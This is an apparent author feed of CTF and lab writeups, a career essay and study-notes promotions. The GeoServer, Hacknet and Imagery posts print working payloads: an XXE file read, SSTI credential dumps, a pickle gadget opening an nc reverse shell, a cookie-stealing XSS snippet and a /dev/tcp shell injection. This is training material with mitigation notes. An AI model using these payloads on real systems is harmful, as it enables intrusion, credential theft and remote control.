DEV Community: Motasem Hamdan

TryHackMe GeoServer's XXE 2025 Walkthrough

Motasem Hamdan — Fri, 06 Feb 2026 10:32:18 +0000

In GeoServer CVE-2025-58360, we are dealing with an XML External Entity (XXE) vulnerability in 2025, a flaw that arguably should have been extinct a decade ago.

The challenge forces you to stop thinking like a script kiddie looking for a Metasploit module and start thinking like a protocol auditor who understands that the standards defining the web (like OGC's WMS) are often the very vectors that betray it.

What This Vulnerability Really Tests

At its core, it is a rigorous examination of your ability to manipulate Structured Data Protocols beyond standard HTTP parameter fuzzing.

It tests your competency in Protocol Switching recognizing that while a Web Map Service (WMS) is typically queried via GET requests in a browser (e.g., ?request=GetMap), the specification mandates support for XML-based POST requests.

This is where the vulnerability lives. The room challenges you to identify that the application's XML parser is configured promiscuously, allowing Document Type Definitions (DTDs) to define external entities.

It tests your ability to craft Out-of-Band or Error-Based data exfiltration payloads, verifying if you can trick a Java application into reading its own filesystem (/etc/passwd) and spitting the content back at you in an error log. It is a test of white-box logic applied to a black-box endpoint.

Enumeration Methodology

The standard directory-busting approach is functionally useless here because the endpoint /geoserver/wms is likely already known or easily discovered. The elite methodology requires a Method Swapping audit.

When you encounter a RESTful or SOAP-like endpoint that behaves normally with GET requests, your immediate instinct must be to test its behavior with POST. You are looking for the Content-Type disparity.

In this specific case, you interact with the GetMap operation. Standard enumeration involves capturing a legitimate GET request for a map layer (like trymapme_offices) and converting it into its XML equivalent.

You aren't just looking for a 200 OK; you are probing the parser.

You send a minimal XML structure to see if the server accepts it. If it does, you inject a benign DTD (like defining an entity &test; with the value "hello") to see if the server resolves it. If "hello" appears in the error message or the rendered map label, you have confirmed the parser is vulnerable.

Cyber Security Notes & Cheat Sheets | The MasterMind Notes / Motasem Hamdan

The official Cyber Security Notes & Cheat Sheets collection for The MasterMind Notes / Motasem Hamdan. Shop products like: The Ultimate CVE Timeline (2010–2026) Cheat Sheet, Cloud SOC Analyst Cheat Sheet | Log Analysis, and more.

shop.motasem-notes.net

Commands Cheat Sheet

While the logic is paramount, having the precision syntax is critical for exploitation, especially when dealing with the strict XML formatting required by GeoServer.

The Execution Command

Use curl to fire this XML at the WMS endpoint, ensuring the Content-Type is strictly set to generic XML or the specific WMS mime-type. curl -X POST -H "Content-Type: application/xml" -d @payload.xml http://<TARGET_IP>/geoserver/wms

The Error-Based XXE Payload:

This payload constructs a malicious XML POST request that defines an external entity pointing to the sensitive file. We place the entity reference &xxe; inside a field we know the server will process (and likely fail on, revealing the data in the error).XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ 
  <!ENTITY xxe SYSTEM "file:///etc/passwd"> 
]>
<GetMap service="WMS" version="1.1.1">
  <StyledLayerDescriptor version="1.0.0">
    <UserLayer>
      <Name>trymapme_offices</Name>
      <UserStyle>
        <Name>&xxe;</Name> <FeatureTypeStyle>
          <Rule>
            <PointSymbolizer/>
          </Rule>
        </FeatureTypeStyle>
      </UserStyle>
    </UserLayer>
  </StyledLayerDescriptor>
</GetMap>

Common Mistakes

The most fatal error on this box is Protocol rigidity. Researchers often try to inject the XXE payload into the URL parameters of a GET request, which will fail because the vulnerable code path is triggered only when the XML parser is invoked via the request body. Another common mistake is Ignoring the Error Logs.

In this specific CVE, the data exfiltration often happens via verbose error messages. If you are expecting the /etc/passwd file to be rendered as a map image, you will be disappointed.

You must read the HTTP response body (the XML error) to find the leaked text. Finally, many testers fail to properly structure the OGC-compliant XML wrapper (GetMap, StyledLayerDescriptor), causing the server to reject the request as "Malformed" before the parser even reaches the malicious DTD.

Tool Usage Patterns

This environment demands a surgical approach to tooling. Burp Suite Professional (or Community) is essential, particularly the Repeater tab, as it allows you to rapidly iterate on the XML structure and view the raw response headers and body.

You will be heavily relying on the Send to Repeater workflow. However, for the initial discovery or if you are working from a headless AttackBox, curl is your scalpel. You need to become comfortable using curl with the -d @filename flag to send clean, pre-formatted XML files, avoiding the escaping hell of trying to put XML into a command-line string.

Automated scanners like SQLMap are useless here; this is a logic flaw in the parser, not a database injection (though it feels similar).

Security Lesson & Mitigation

The primary lesson from CVE-2025-58360 is that default configurations are often insecure. GeoServer vulnerabilities frequently arise because the underlying XML parsers (often provided by Java libraries) have external entity resolution enabled by default.

Mitigation

The fix is rarely in the code logic but in the parser configuration. Developers must explicitly disable DTD processing in their DocumentBuilderFactory settings (setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)).

Infrastructure Defense

On the network level, egress filtering is critical. If the XXE was Blind (no error output), the attacker would try to make the server call out to their machine. Blocking the server from initiating outbound connections to the internet or internal subnets neuters the SSRF component of this attack.

TryHackMe SAL1 Study Notes & Guide (Unofficial) - Buymeacoffee

TryHackMe SAL1 Study Notes is designed as a comprehensive guide for cybersecurity beginners and those preparing for the TryHackMe SAL1 exam. It provides structured study materials covering security fo

buymeacoffee.com

Expert Hints

If you are investigating the logs to answer the room's questions, pay close attention to the geoserver_app.log. The vulnerability is "noisy." When the attacker (or you) forces the server to read a file that isn't a valid style descriptor, the server throws an exception.

That exception contains the content of the file it tried to parse. Look for stack traces that seem to contain "root❌0:0" strings—that's your stolen password file. Also, remember that the "flag" might not be in a standard text file; the attacker might have used the XXE to list directories or read application config files to find it.

Certifications Prep Suggestions

This machine is an ideal training ground for intermediate-to-advanced certifications that require manual web application exploitation:

OSWE (OffSec Web Expert): The requirement to construct a valid XML payload based on reading documentation (OGC standards) and then exploiting it is the core of the OSWE exam.

BSCP (Burp Suite Certified Practitioner): This is a textbook example of "XML External Entity injection," a category that frequently appears in the BSCP exam's mystery labs.

eWPTX (eLearnSecurity Web Penetration Tester eXtreme): The need to pivot from a known service (WMS) to an exploitation vector fits perfectly with the eWPTX syllabus.

Join the Cyber Security Notes Membership:

Membership | The MasterMinds Notes - Buymeacoffee

AboutCyber Security Notes & CoursesContactconsultation@motasem-notes.netProduct's Legal & TOS InfoPlease read all terms of service and legal information about the products from hereReviews and

buymeacoffee.com

TryHackMe Room Answers

Room answers can be found here

SSTI Explained: HTB Hacknet Writeup

Motasem Hamdan — Wed, 04 Feb 2026 18:20:57 +0000

Welcome to HTB Hacknet, a Hard-difficulty machine on Hack The Box that tests your ability to read the developer’s mind. This is a masterclass in Framework Exploitation and Insecure Deserialization.

In this detailed breakdown, we dissect an attack chain that starts with a Python web framework blindly trusting user input and ends with a race condition in a root-privileged maintenance script.

We will explore how to traverse internal objects to leak data without SQL, how to weaponize Python serialization, and why standard automated scanners will leave you empty-handed on this box.

Phase 1: Behavioral Reconnaissance

Hacknet demands a departure from the loud and proud automated scanning methodology. While Nmap gives us the coordinates, the entry point is hidden in the application logic.

sudo nmap -p- -sS -T4 -Pn --min-rate 2000 10.10.11.85

Expert Insight:

Automated directory busters often fail here because the vulnerability is a hidden behavior.

HackTheBox Certified Penetration Testing Specialist (CPTS) Study Notes | 2026 Edition + FREE CHEAT SHEET - Buymeacoffee

The HackTheBox CPTS Study Notes V8 are an 856-page PDF guide updated to meet the changes performed on the exam in 2026. They are designed to help candidates prepare for the Hack The Box Certified Pene

buymeacoffee.com

Phase 2: Server-Side Template Injection

We identify a classic sink: the Username field. However, the injection doesn’t trigger immediately on the main profile view. It triggers only when viewing the /likes/{id} endpoint. This is a lesson in Context Discovery, understanding that data flows through multiple templates, some more secure than others.

The application uses a Python framework (likely Flask or Django) that fails to sanitize input before rendering it. This allows us to inject Server-Side Template Injection (SSTI) payloads.

The Payload Strategy:

We input {{ 7*7 }}. If the page renders 49, we have execution.

We don’t just want a shell; we want data. We use the template engine to introspect the users object array.

Instead of brute-forcing a login, we query index 0 of the user array (users.0). In most databases, the first user created is the Administrator.

# Verification Payload (Username field)
{{ 7*7 }}

# Recon Payload (Dump object values)
{{ users.values }}# Exfiltration Payload (Targeting the Admin)
{{ users.0.email }}
{{ users.0.password }}

Phase 3: Race Conditions & Serialization

Gaining a foothold as a low-privileged user is only half the battle. The privilege escalation phase shifts gears to Linux System Internals.

We discover a root-privileged process that interacts with the /var/tmp directory. This process is running a cleanup script that deletes cache files. However, it blindly deserializes the contents of files in this directory using Python's pickle module. This creates a Race Condition.

The Vulnerability: The root process trusts that files in /var/tmp are valid cache files. It reads them and deserializes them. If we can plant a malicious serialized object (a "pickle bomb") and name it correctly right before the script processes it, the root user executes our code.

The Exploit Pattern:

Monitor: Use watch to see when the cleanup script runs.

Weaponize: Create a Python script that generates a pickled object containing a reverse shell payload.

Race: Run a loop that constantly writes this malicious file to /var/tmp, hoping to catch the root process mid-execution.

# File System Forensics (Watch for cadence)
watch -n 1 'ls -ltr /var/tmp/django_cache'

# The Pickle Payload Logic (Conceptual Python)
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.x 4444 >/tmp/f',))

Expert Insight:

Tools like LinPEAS are invaluable here, but you must know how to read them. Ignore the CVE suggestions.

Phase 4: Post-Exploitation Forensics

Getting root is the beginning of the looting phase. We find GPG-encrypted artifacts.

This mimics a real-world engagement where credentials are often secured but accessible to admins.

HackTheBox Certified Web Exploitation Specialist (HTB CWES) Notes (Unofficial) - Buymeacoffee

Welcome to the HTB Certified Web Exploitation Specialist (HTB CWES) Guide. Whether you’re just starting your journey in ethical hacking or looking to refine your existing skills, this resource is stru

buymeacoffee.com

The Workflow:

Exfiltrate the armored key and the encrypted backup.
Convert the key to a hash using gpg2john.
Crack the hash with John the Ripper to get the passphrase.
Decrypt the backup to find hardcoded secrets.

# Convert Key for Cracking
gpg2john armored_key.asc > hash

# Import & Decrypt
gpg --import armored_key.asc
gpg --decrypt backup.sql.gpg

Why SSTI Was the Silent Killer of 2025

While the industry obsessed over AI hallucinations and memory safety in 2025, Server-Side Template Injection (SSTI) quietly returned to become a primary vector for cloud compromise.

The Glue Code Problem

The biggest revelation was that AI pipelines are built on old foundations. Vulnerabilities like CVE-2025–25362 (The Spacy-LLM Incident) showed that widely used NLP libraries were taking user prompts and passing them directly into template engines to format them for LLMs. Attackers injected a payload that the underlying Python service executed.

2. CMS Fatigue

Major platforms like Craft CMS and Grav suffered critical failures where the template sandboxes (like Twig) were bypassed. Marketing teams demanded dynamic content, and developers obliged by exposing raw template engines, leading to massive ransomware events in the retail sector.

3. The Cloud Pivot

In 2025, an SSTI owns the cloud. Attackers use the RCE to land in a container, query the internal metadata service (IMDS), steal the IAM role, and pivot to S3 buckets or infrastructure destruction.

Expert Insight:

Template engines are effectively eval() functions with better PR. The 'Mean Time to Innocence' for SSTI is zero.

Certification Roadmap

Hacknet is a simulator for high-level certifications.

OSWE (OffSec Web Expert): The requirement to identify/exploit SSTI and interact with backend Python objects is core curriculum.

OSEP (OffSec Experienced Penetration Tester): The focus on Linux post-exploitation, custom timers, and race conditions aligns perfectly.

eWPTX: Advanced serialization attacks and template injection are heavy features of this exam.

Why I Quit Chasing The Cyber Security Dream

Motasem Hamdan — Wed, 04 Feb 2026 16:42:10 +0000

In this article, I pull back the curtain on cybersecurity and strip away the polished image many outsiders imagine. It’s not all digital heroism and fast-paced hacks. Whether you’re part of the blue team defending networks or the red team probing for weak spots, the reality looks more like late night shifts, eyes blurred from logs, constant stress, and a sense that you’re always chasing shadows.

The job asks for patience and the kind of focus that makes your head hurt. It’s about combing through layers of code, interpreting patterns, and staying alert in ways most people never see. Not for those looking for thrills alone, this path’s more grind than glory.

For years, I pursued the cybersecurity dream, immersed in code, certifications, and the constant chase for the next big role. But somewhere along the way, I lost sight of why I started. The pressure to stay relevant, the burnout, the imposter syndrome, it all became too much.

So I stepped back. Not because I failed, but because I realized success isn’t just about titles or tech stacks. It’s about alignment, purpose, and peace.

Cyber Security Certification Study Notes | The MasterMind Notes / Motasem Hamdan

The official Cyber Security Certification Study Notes collection for The MasterMind Notes / Motasem Hamdan. Shop products like: Offensive Security Web Expert (OSWE) Study Notes (Unofficial) and Burp Suite Guide, TryHackMe PT1 Study Notes (Unofficial), and more.

shop.motasem-notes.net

Mental Toll is Real
Press enter or click to view image in full size

Okay, I will open up about how deeply cybersecurity work can take a toll, not just mentally but physically too. Years spent bouncing between blue team defense and red team offense wore me down.

Burnout didn’t show up all at once. It crept in slowly, building over time until it became impossible to ignore. The stress, the nonstop pressure, and the demanding pace eventually pushed me to step back for good. Changing how I use my cybersecurity knowledge wasn’t an easy call, but it turned out to be necessary.

Choosing my health meant giving up a job I’d invested years into. Still, I moved forward, chasing a life with more balance and peace, even if it meant starting over.

I genuinely enjoyed the technical side of it all, but five years in, the stress just wore me down. No matter how much I tried to power through, it started bleeding into other parts of my life. The sleep got worse, workouts took a hit, and eventually, I had to ask himself if the high pay was worth feeling that wrecked every day.

In the end, I chose my health. Regular swimming, lifting weights, martial arts, those became my therapy. I walked away from a stressful job because, in my words, no paycheck is worth your peace of mind. My message for people thinking about getting into cybersecurity is pretty clear: it’s not just a career choice. It’s a lifestyle. You’ve got to ask yourself if you’re ready to carry that weight day in and day out.

Cybersecurity Certificates can help, sure, especially well-regarded ones like CompTIA Security+ or OSCP. They show you’ve got foundational knowledge or hands-on skills.

But according to the me, they aren’t everything. What really sticks out? The work you’ve done, the things you’ve built, and how you talk about it. Actual projects and experience tell a much louder story than a list of acronyms on a résumé. Plus, interviews matter. ==A lot. How you explain your process, your role in a project, the way you solve problems, all of that carries more weight than just collecting more paper.== ==At some point, certificates start looking more like padding than proof.==

Extras | The MasterMinds Notes - Buymeacoffee

AboutCyber Security Notes & CoursesContactconsultation@motasem-notes.netProduct's Legal & TOS InfoPlease read all terms of service and legal information about the products from hereReviews and

buymeacoffee.com

Networking Over Certs

Press enter or click to view image in full size

Building a professional network isn’t just helpful, it’s essential. While certifications can polish your résumé, real progress often comes through people. Platforms like LinkedIn and GitHub aren’t just digital portfolios; they’re modern meeting spots. They show what you’ve built and who you’re connected to. Employers scroll those pages as much as résumés now.

Going to industry conferences, joining online communities, or even jumping into comment sections can quietly open doors. These are places where quiet introductions turn into long-term opportunities. It’s not always about who’s the loudest or most impressive, just being present and consistent matters.

Making friends in your field, helping out when you can, and showing genuine interest creates something a certification can’t, a sense of trust. And when people trust you, they think of you when new jobs or projects pop up.

So while certifications prove you know something, your network is what gets you the call back.

Learning Resources Are Often Misleading

A lot of content out there on cybersecurity isn’t really meant to teach. It’s more about getting clicks or boosting someone’s name. That’s why it’s so important to stay sharp and not take everything at face value. Just because something’s popular doesn’t mean it’s solid. Some tutorials or courses might cover the basics or even sound convincing, but they can leave you with a false sense of confidence.

if you really care about learning, you’ve got to look beyond what’s trending. Double-check where the info comes from. Don’t just rely on the first YouTube video or blog post you find. Trust is earned, not assumed. Keep reading. Keep asking questions. Stay curious. This field changes fast, and the only way to keep up is to keep pushing yourself.

That’s how you actually get good, by never settling for surface-level knowledge.

Alternative Career Paths
Traditional jobs aren’t the only route anymore. You’ve got people carving out paths through freelancing, making content online, or even building something big like a cybersecurity academy.

But those options take more than just being good at what you do. They demand a steady hand and serious drive. No one’s standing over your shoulder keeping you on track.

You’ve gotta manage your time, keep learning, push through when things stall, and find your own rhythm, day in, day out. It’s like building your own boat and sailing it too. You learn fast whether you’re cut out for the sea.

Video

Ultimate HTB CPTS 2026 Notes: The Complete Study Guide

Motasem Hamdan — Wed, 04 Feb 2026 16:25:54 +0000

If you are rigorously preparing for the HackTheBox Certified Penetration Testing Specialist certification, having a centralized and exhaustive resource is non-negotiable. These HTB CPTS Notes serve as the definitive "Mastermind" companion, meticulously compiling over 700 pages of critical enumeration techniques, exploitation methodologies, and post-exploitation strategies.

Unlike scattered blog posts or fragmented wiki pages, this guide consolidates the entire penetration testing lifecycle from initial information gathering to complex Active Directory attacks into a single, cohesive workflow. Whether you are struggling with specific protocol enumeration or need a structured approach to the 10-day practical exam, these notes provide the technical depth and command-line precision required to pass.

Comprehensive Information Gathering & Network Enumeration

Success in the CPTS exam hinges on the ability to discover the unseen. The HTB CPTS Notes begin with a deep dive into active information gathering, offering far more than just basic Nmap syntax.

The guide details advanced scanning techniques, including firewall and IDS/IPS evasion using decoys and fragmented packets, ensuring you can map networks even in hostile environments. It provides extensive cheat sheets for enumerating essential protocols such as SMB, SNMP, NFS, and MySQL, alongside specialized tools like enum4linux, snmpwalk, and rpcclient. By mastering these enumeration steps, you ensure that no service is left unchecked, creating a solid foundation for the exploitation phase.

Deep Dive into Active Directory Exploitation

Active Directory (AD) is a significant component of the CPTS exam, and these notes dedicate substantial space to demystifying AD attacks. You will find detailed workflows for enumerating domains, users, and groups using PowerShell and BloodHound to map attack paths. The HTB CPTS Notes cover critical attack vectors such as Kerberoasting, AS-REP Roasting, and Pass-the-Hash, explaining not just the tools (like Impacket and Rubeus) but the underlying mechanics of Kerberos authentication.

Furthermore, the guide walks you through complex lateral movement techniques and domain privilege escalation, ensuring you can navigate from a single compromised workstation to complete Domain Admin control.

Web Application Penetration Testing Mastery

Web exploitation is vast, but these notes distill the chaos into actionable methodologies. The guide covers the OWASP Top 10 and beyond, providing concrete examples and payloads for SQL Injection (including blind and boolean-based), Cross-Site Scripting (XSS), and Server-Side Template Injection (SSTI).

It specifically targets Content Management Systems (CMS) like WordPress, Joomla, Drupal, and Jenkins, offering specific enumeration steps and exploit chains for each. Whether you are bypassing file upload filters, manipulating JSON Web Tokens (JWT), or exploiting Insecure Deserialization, the HTB CPTS Notes provide the exact syntax and theoretical background needed to identify and exploit these vulnerabilities during your exam.

Privilege Escalation and Post-Exploitation

Gaining a foothold is only half the battle; these notes ensure you can escalate privileges on both Windows and Linux systems. For Windows, the guide details manual enumeration of misconfigured services, unquoted service paths, and kernel exploits, alongside automated tools like WinPEAS.

For Linux, it covers SUID binary exploitation, cron job abuse, and NFS root squashing. Beyond escalation, the notes emphasize post-exploitation and reporting—crucial skills for the CPTS. You will learn how to maintain persistence, harvest credentials using Mimikatz and LaZagne, and, most importantly, how to document your findings professionally using tools like SysReptor to meet the strict reporting standards of the exam.

Access a Preview Below

HTB CPTS Notes | Updated 2026 by Motasem Hamdan

Start Below

Don't leave your certification to chance. Equip yourself with the most detailed, exam-focused reference material available.

Click Here to Buy the Full HTB CPTS Notes Book Now

HackTheBox Certified Penetration Testing Specialist (CPTS) Study Notes | 2026 Edition - Buymeacoffee

buymeacoffee.com

From Stored XSS to RCE | HackTheBox Imagery Writeup

Motasem Hamdan — Wed, 04 Feb 2026 12:53:49 +0000

I see it all the time in pentest reports: Stored XSS gets rated as Medium or even Low because it requires user interaction. But my recent run through HackTheBox’s Imagery machine reminded me why that mindset is dangerous.

The box is a perfect example of a Daisy Chain attack where a seemingly minor client-side bug becomes the skeleton key for the entire backend.

Note:

This post is not a step-by-step walkthrough, exploit guide, or solution. It is intentionally written as a learning-first methodology breakdown.

The value of this approach is simple: walkthroughs teach what to type; methodologies teach how to think. By focusing on enumeration strategy, decision-making patterns, and architectural reasoning, this post is designed to help you transfer the same mindset to real assessments, labs, certifications, and production environments not just this specific challenge.

Use this content to:

Sharpen your mental model, not your copy-paste skills
Understand why certain paths exist rather than memorizing how to reach them
Build repeatable intuition that applies beyond CTFs

If your goal is long-term growth as a security practitioner, this style will compound. If your goal is only to solve the box, this post is deliberately not optimized for that.

Here is the TL;DR of the kill chain:

The Enumeration Methodology

The standard approach of blindly firing directory busters will yield limited returns here. The elite methodology requires a Feature-First audit.

Upon discovering the web service on port 8000 (running Werkzeug/Python), your primary goal isn’t just to map endpoints, but to map data flows. You must identify every input field, login forms, upload buttons, and critically, the “Bug Report” feature.

The presence of a bug report system should trigger immediate investigation into Stored Cross-Site Scripting (XSS) vectors.

You are asking: If I submit this, who reads it? If the answer is “an admin, you have a potential path to privilege hijacking.

Simultaneously, the Image Transformation features (crop, rotate, etc.) must be flagged as high-probability targets for Command Injection, as these often rely on underlying system shell commands rather than safe API calls.

HackTheBox Certified Web Exploitation Specialist (HTB CWES) Notes (Unofficial) - Buymeacoffee

buymeacoffee.com

Stored XSS

It started with a standard “Bug Report” feature. Most would check for SQLi and move on. I found I could inject a payload that stored XSS.

Cookie Theft

It wasn’t about popping an alert box. I used the XSS to blindly exfiltrate the Administrator’s session cookie when they (the bot/admin) reviewed the report.

The RCE

With admin access, I reached the image management panel. Code review (leaked via a directory traversal bug) revealed a Command Injection flaw in the crop feature—but it was only accessible to authenticated admins. Without that "low prio" XSS, the RCE was unreachable.

The PrivEsc

Leaked the database credentials to crack the test user's hash.

Found an encrypted backup (pyAesCrypt), brute-forced it to find another user's hash.

Finally rooted the box by abusing a custom backup utility running with sudo privileges.

Commands Cheat Sheet

While the logic is paramount, having the right syntax is critical for execution.

XSS Payload (Session Stealing): Inject this into the bug report description to exfiltrate the admin’s cookie to your listener.

:4444/?cookie='+document.cookie>

Cookie Listener:

nc -lvnp 4444

Command Injection (ImageMagick Context): If the application naively concatenates arguments, you can break out of the convert command. ; /bin/bash -c 'bash -i >& /dev/tcp//4445 0>&1';

Stabilizing the Shell:

python3 -c 'import pty; pty.spawn("/bin/bash")' (Ctrl+Z) stty raw -echo; fg

Privilege Escalation (Cron/File Monitoring): If a root script processes files in a directory you control, creating a malicious file name or content can trigger execution.

echo 'import os; os.system("/bin/bash")' > /tmp/malicious.py

The Takeaway

If you are ignoring XSS to hunt for “cooler” binary exploits, you are missing the forest for the trees. In modern web apps, XSS is often the only way to bridge the gap between “Public User” and “Internal Admin” where the RCEs actually live.

If you want to see the exact payloads, the Python scripts I used for the crypto-cracking, and the full step-by-step breakdown, check out my writeup here

Join the Cyber Security Notes Membership:

Get exclusive cybersecurity notes, weekly expert insights, and practical breakdowns you won’t find in public feeds. Built for people who want clarity, not content overload.

Membership | The MasterMinds Notes - Buymeacoffee

AboutCyber Security Notes & CoursesContactconsultation@motasem-notes.netProduct's Legal & TOS InfoPlease read all terms of service and legal information about the products from hereReviews and

buymeacoffee.com

HackTheBox Sherlock Brutus Writeup

Motasem Hamdan — Wed, 04 Feb 2026 12:10:51 +0000

Introduction

HackTheBox Brutus is a beginner-level DFIR challenge that includes an auth.log file and a wtmp file as key artifacts. Using these, we’ll track how an attacker conducted an SSH brute force attack, ultimately succeeding in guessing the root user’s password. We’ll then analyze how the attacker manually reconnects, creates a new user, and adds this user to the sudo group. Finally, We’ll observe how the new user logs in and executes a few commands with sudo privileges.

HackTheBox Sherlock Brutus Description

In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We’ll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.

HackTheBox Sherlock Brutus Questions

Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?
The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?
Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?
SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?
The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?
What is the MITRE ATT&CK sub-technique ID used for persistence?
How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)
The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

Analysis

Analyzing auth.log

The auth.log file records both successful and failed login attempts, sudo and su actions, and other authentication-related processes. On Debian/Ubuntu systems, this log is stored at /var/log/auth.log, while on RedHat/CentOS systems, it is located at /var/log/secure. Referring to the first entry in the auth.log for Brutus:

Date/Time: March 6 at 06:18:01
Hostname: ip-172–31–35–28
Service: The cron service
Process ID (PID): 1119
Message: The root user initiated a cron job (scheduled Linux task) executed as the confluence user, who has a user ID (UID) of 998.

motasem@kali$ unzip -l Brutus.zip   
Archive:  Brutus.zip  
      Date       Name  
  ----------   ----  
    11:47   auth.log  
   11:47   wtmp

Certified Cyber Defender (CCDL2) Study Notes (Unofficial) - Buymeacoffee

The CCDL2 (formerly CCD) Study Notes are a comprehensive guide designed to prepare individuals for the CCDL2 certification exam. They cover a wide range of topics pertinent to cybersecurity defense, i

buymeacoffee.com

Analyzing wtmp

The wtmp file is one of three files used to log login and logout events on a Linux system:

/var/run/utmp: Tracks currently logged-in users.
/var/log/wtmp: Maintains a historical record of login and logout events.
/var/log/btmp: Logs unsuccessful login attempts.

motasem@kali$ head -1 auth.log   
Dec  01 03:13:41 ip-172-31-35-28 CRON[1119]: pam_unix(cron:session): session opened for user confluence(uid=998) by (uid=0)

These files store their data in a binary format, so their contents cannot be easily understood when accessed directly. Instead, specific Linux utilities are used to parse and display their information.

For btmp, the who (or w) command will display its contents.
The last command can be used to view wtmp.
The lastb command is for examining btmp.

motasem@kali$ sudo lastb  
root     pts/13                        Dec  01 03:13:41  (00:00)

btmp begins Dec  01 03:13:41

To examine a wtmp file independently, the utmpdump utility can be used. It is included in the util-linux package, which can be installed via sudo apt install util-linux. When viewing the contents of a wtmp file with utmpdump, the output includes the following columns:

Event Type
PID (Process ID)
Terminal ID
User
Host
IP Address
Timestamp

motasem@kali$ utmpdump wtmp   
Utmp dump of wtmp  
[2] [00000] [~~  ] [reboot  ] [~           ] [6.2.0-1017-aws      ] [0.0.0.0        ] [2024-01-25T11:12:17,804944+00:00]  
[5] [00601] [tyS0] [        ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,072401+00:00]  
[6] [00601] [tyS0] [LOGIN   ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,072401+00:00]  
[5] [00618] [tty1] [        ] [tty1        ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,080342+00:00]  
[6] [00618] [tty1] [LOGIN   ] [tty1        ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,080342+00:00]  
[1] [00053] [~~  ] [runlevel] [~           ] [6.2.0-1017-aws      ] [0.0.0.0        ] [2024-01-25T11:12:33,792454+00:00]  
[7] [01284] [ts/0] [ubuntu  ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-01-25T11:13:58,354674+00:00]  
[8] [01284] [    ] [        ] [pts/0       ] [                    ] [0.0.0.0        ] [2024-01-25T11:15:12,956114+00:00]  
[7] [01483] [ts/0] [root    ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-01-25T11:15:40,806926+00:00]  
[8] [01404] [    ] [        ] [pts/0       ] [                    ] [0.0.0.0        ] [2024-01-25T12:34:34,949753+00:00]  
[7] [836798] [ts/0] [root    ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-02-11T10:33:49,408334+00:00]  
[5] [838568] [tyS0] [        ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-02-11T10:39:02,172417+00:00]  
[6] [838568] [tyS0] [LOGIN   ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-02-11T10:39:02,172417+00:00]  
[7] [838962] [ts/1] [root    ] [pts/1       ] [203.101.190.9       ] [203.101.190.9  ] [2024-02-11T10:41:11,700107+00:00]  
[8] [838896] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-02-11T10:41:46,272984+00:00]  
[7] [842171] [ts/1] [root    ] [pts/1       ] [203.101.190.9       ] [203.101.190.9  ] [2024-02-11T10:54:27,775434+00:00]  
[8] [842073] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-02-11T11:08:04,769514+00:00]  
[8] [836694] [    ] [        ] [pts/0       ] [                    ] [0.0.0.0        ] [2024-02-11T11:08:04,769963+00:00]  
[1] [00000] [~~  ] [shutdown] [~           ] [6.2.0-1017-aws      ] [0.0.0.0        ] [2024-02-11T11:09:18,000731+00:00]  
[2] [00000] [~~  ] [reboot  ] [~           ] [6.2.0-1018-aws      ] [0.0.0.0        ] [2024-03-06T06:17:15,744575+00:00]  
[5] [00464] [tyS0] [        ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,354378+00:00]  
[6] [00464] [tyS0] [LOGIN   ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,354378+00:00]  
[5] [00505] [tty1] [        ] [tty1        ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,469940+00:00]  
[6] [00505] [tty1] [LOGIN   ] [tty1        ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,469940+00:00]  
[1] [00053] [~~  ] [runlevel] [~           ] [6.2.0-1018-aws      ] [0.0.0.0        ] [2024-03-06T06:17:29,538024+00:00]  
[7] [01583] [ts/0] [root    ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-03-06T06:19:55,151913+00:00]  
[7] [02549] [ts/1] [root    ] [pts/1       ] [65.2.161.68         ] [65.2.161.68    ] [2024-03-06T06:32:45,387923+00:00]  
[8] [02491] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-03-06T06:37:24,590579+00:00]  
[7] [02667] [ts/1] [cyberjunkie] [pts/1       ] [65.2.161.68         ] [65.2.161.68    ] [2024-03-06T06:37:35,475575+00:00]

SSH Brute Force Analysis

To investigate a brute force attack over SSH, we’ll start by examining failed login attempts, as these won’t appear in the wtmp file. The auth.log file is relatively short at 385 lines, allowing for a manual scan to spot any anomalies. The log captures activity from March 6 within a 21-minute timeframe, from 06:18:01 to 06:41:01.

motasem@kali$ wc -l auth.log   
385 auth.log

Since the auth.log format can be cumbersome to parse compared to structured formats like JSON, we’ll leverage Bash skills with commands like cut and grep for analysis. My approach to understanding the various services in the log involves:

Extracting the service name:

Using cut with a space delimiter to isolate the 6th field (e.g., CRON[1119]:).
Piping this output into cut again, splitting on [ to isolate just the service name (e.g., CRON).

Sorting and counting occurrences:

Piping the results into sort | uniq -c | sort -nr to generate a frequency-sorted list of unique service names.

